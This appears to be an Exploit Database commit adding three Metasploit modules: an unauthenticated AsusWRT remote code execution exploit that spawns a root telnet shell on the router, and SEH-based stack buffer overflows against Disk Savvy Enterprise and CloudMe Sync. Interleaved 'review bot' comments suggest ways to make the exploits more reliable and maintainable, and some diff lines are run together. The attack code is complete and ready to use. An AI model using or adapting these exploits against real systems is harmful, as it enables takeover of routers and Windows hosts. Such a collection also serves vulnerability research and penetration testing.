From d0ed4bb0d224c6768aea2e21c4dd8848f39358a6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 27 Feb 2018 05:01:54 +0000 Subject: [PATCH] DB: 2018-02-27 3 changes to exploits/shellcodes Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit) CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)
---
exploits/hardware/remote/44176.rb | 132 ++++++++++++++++++++++++++++++
exploits/windows/remote/44174.rb | 77 +++++++++++++++++
exploits/windows/remote/44175.rb | 67 +++++++++++++++
files_exploits.csv | 3 +
4 files changed, 279 insertions(+)
create mode 100755 exploits/hardware/remote/44176.rb
create mode 100755 exploits/windows/remote/44174.rb
create mode 100755 exploits/windows/remote/44175.rb
diff --git a/exploits/hardware/remote/44176.rb b/exploits/hardware/remote/44176.rb
new file mode 100755
index 000000000..92c961624
--- /dev/null
+++ b/exploits/hardware/remote/44176.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Udp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',
+ 'Description' => %q{
+ The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to
+ perform a POST in certain cases. This can be combined with another vulnerability in
+ the VPN configuration upload routine that sets NVRAM configuration variables directly
+ from the POST request to enable a special command mode.
+ This command mode can then be abused by sending a UDP packet to infosvr, which is running
+ on port UDP 9999 to directly execute commands as root.
+ This exploit leverages that to start telnetd in a random port, and then connects to it.
+ It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.
+ },
+ 'Author' =>
+ [
+ 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
+ ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
+ ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],
+ ['CVE', '2018-5999'],
+ ['CVE', '2018-6000']
+ ],
+ 'Targets' =>
+ [
+ [ 'AsusWRT < v3.0.0.4.384.10007',
+ {
+ 'Payload' =>
+ {
+ 'Compat' => {
+ 'PayloadType' => 'cmd_interact',
+ 'ConnectionType' => 'find',
+ },
+ },
+ }
+ ],
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+ 'DisclosureDate' => 'Jan 22 2018',
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ Opt::RPORT(9999)
+ ])
+
+ register_advanced_options(
+ [
+ OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])
+ ])
+ end
+
+ def exploit
+ # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD
+ # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!
+ post_data = Rex::MIME::Message.new
+ post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"")
+
+ data = post_data.to_s
+
+ res = send_request_cgi({
+ 'uri' => "/vpnupload.cgi",
+ 'method' => 'POST',
+ 'rport' => datastore['ASUSWRTPORT'],
+ 'data' => data,
+ 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+ })
+
+ if res and res.code == 200
+ print_good("#{peer} - Successfully set the ateCommand_flag variable.")
+ else
+ fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.")
+ end
+
+
+ # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.
+ info_pdu_size = 512 # expected packet size, not sure what the extra bytes are + r = Random.new + + ibox_comm_pkt_hdr_ex = + [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC + [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 + [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 + r.bytes(4) + # Info, don't know what this is + r.bytes(6) + # MAC address + r.bytes(32) # Password + + telnet_port = rand((2**16)-1024)+1024 + cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*') + pkt_syscmd = + [cmd.length,0x00].pack('C*') + # cmd length + cmd # our command + + pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) + + connect_udp + udp_sock.put(pkt_final) # we could process the response, but we don't care + disconnect_udp + + print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}") + sleep(10) + + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) + if not sock.nil? + print_good("#{peer} - Success, shell incoming!") + return handler(sock) + end + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + end + + print_bad("#{peer} - Well that didn't work... try again?") + end +end \ No newline at end of file diff --git a/exploits/windows/remote/44174.rb b/exploits/windows/remote/44174.rb new file mode 100755 index 000000000..82e87706d --- /dev/null +++ b/exploits/windows/remote/44174.rb 
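Review bot: `exploit` leaves the router in a worse state than it found it and never says so: the first POST to `/vpnupload.cgi` writes `ateCommand_flag=1` into NVRAM (per the module's own description of the upload routine) and the PKT_SYSCMD starts `telnetd -l /bin/sh` on a random port, and neither is reverted, so after the engagement any LAN host can keep driving infosvr on 9999 or the unauthenticated root telnet listener. At minimum warn the operator once the shell is obtained, e.g. `print_warning("#{peer} - ateCommand_flag is still set and telnetd is listening on #{telnet_port} as root; reset the flag and kill telnetd when done")`, and consider re-posting `'0'` for `ateCommand_flag` through the same multipart request as a cleanup step. `res.code == 200` is also taken as proof that the NVRAM variable was written, which a 200 from `vpnupload.cgi` presumably does not guarantee, so the success message should be hedged. Finally, `Rex::Socket.create_tcp` raises on connection failure rather than returning nil as far as I can tell, so the `if not sock.nil?` guard is dead and the single attempt after a fixed `sleep(10)` would be more reliable as a bounded retry loop.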
@@ -0,0 +1,77 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Savvy Enterprise v10.4.18', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in Disk Savvy Enterprise v10.4.18, caused by improper bounds + checking of the request sent to the built-in server. This module + has been tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Daniel Teixeira' + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x02\x0a\x0d\xf8", + 'Space' => 800 + }, + 'Targets' => + [ + [ 'Disk Savvy Enterprise v10.4.18', + { + 'Offset' => 124, + 'Ret' => 0x10056d13 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 31 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(9124)]) + + end + + def exploit + seh = generate_seh_record(target.ret) + connect + + buffer = make_nops(target['Offset']) + buffer << seh + buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh + buffer << "\x83\xc4\x21" #ADD esp,21h + buffer << "\xff\xe4" #JMP esp + buffer << payload.encoded + buffer << Rex::Text.rand_text_alphanumeric(1) + + header = "\x75\x19\xba\xab" + header << "\x03\x00\x00\x00" + header << "\x00\x40\x00\x00" + header << [buffer.length].pack("V") + header << [buffer.length].pack("V") + header << [buffer[-1].ord].pack("V") + packet = header + packet << buffer + + sock.put(packet) + handler + end +end \ No newline at end of file diff --git a/exploits/windows/remote/44175.rb b/exploits/windows/remote/44175.rb new file mode 100755 index 000000000..5d7fcac75 --- /dev/null +++ b/exploits/windows/remote/44175.rb 
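Review bot: The metadata in `initialize` is thin for a `GreatRanking` module: `Name` is only the product string with no vulnerability wording, there is no `References` array, and `Ret` is a bare `0x10056d13` with nothing saying which module hosts the POP/POP/RET or why it is assumed non-rebased. The CSV hunk in this same commit lists the author's earlier Disk Savvy 10.4.18 SEH exploit as EDB 44156, so `'References' => [[ 'EDB', '44156' ]]` is available right now, and a `# POP/POP/RET in <module>` comment next to `Ret` would let the next person re-verify the gadget. `'DisclosureDate' => 'Jan 31 2017'` also predates that 2018-02-21 EDB entry; it may be correct for an earlier advisory, but it is worth confirming. In `exploit`, the stack-adjust stub (`ADD esp,7fh` x13, `ADD esp,21h`, `JMP esp`) and the `header` fields (`\x75\x19\xba\xab`, `\x03\x00\x00\x00`, `\x00\x40\x00\x00`, the two length words and the last byte of `buffer`) are undocumented magic; a one-line comment per field naming what the server parses it as would make the exploit maintainable.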
@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'CloudMe Sync v1.10.9',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability
+ in CloudMe Sync v1.10.9 client application. This module has been
+ tested successfully on Windows 7 SP1 x86.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'hyp3rlinx', # Original exploit author
+ 'Daniel Teixeira' # MSF module author
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2018-6892'],
+ [ 'EDB', '44027' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ },
+ 'Targets' =>
+ [
+ [ 'CloudMe Sync v1.10.9',
+ {
+ 'Offset' => 2232,
+ 'Ret' => 0x61e7b7f6
+ }
+ ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Jan 17 2018',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(8888)])
+
+ end
+
+ def exploit
+ connect
+
+ buffer = make_nops(target['Offset'])
+ buffer << generate_seh_record(target.ret)
+ buffer << payload.encoded
+
+ sock.put(buffer)
+ handler
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dd6c9bbf8..8d7075e41 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
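Review bot: The `Payload` hash in `initialize` declares only `BadChars` and no `Space`, so the framework has no upper bound on the encoded payload that `exploit` appends after the SEH record at offset 2232; if the usable room past the overflow is smaller than a given encoded payload the module will silently fail or corrupt the stack instead of rejecting the payload up front. Add the measured limit, `'Space' => N` inside the `Payload` hash, once it has been confirmed against the original EDB 44027 exploit. `'Privileged' => true` also looks questionable for what the description calls a client application; if CloudMe Sync runs as the logged-in user this should be `false` so sessions are not reported as elevated. As in the Disk Savvy module in this commit, `'Ret' => 0x61e7b7f6` carries no comment on which module hosts the POP/POP/RET, which is what anyone re-validating against a different build needs first.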
@@ -16252,6 +16252,9 @@ id,file,description,date,author,type,platform,port
 44155,exploits/windows/remote/44155.py,"EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow",2018-02-21,"Juan Sacco",remote,windows,
 44156,exploits/windows/remote/44156.py,"Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
 44157,exploits/windows/remote/44157.py,"Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
+44174,exploits/windows/remote/44174.rb,"Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,9124
+44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
+44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,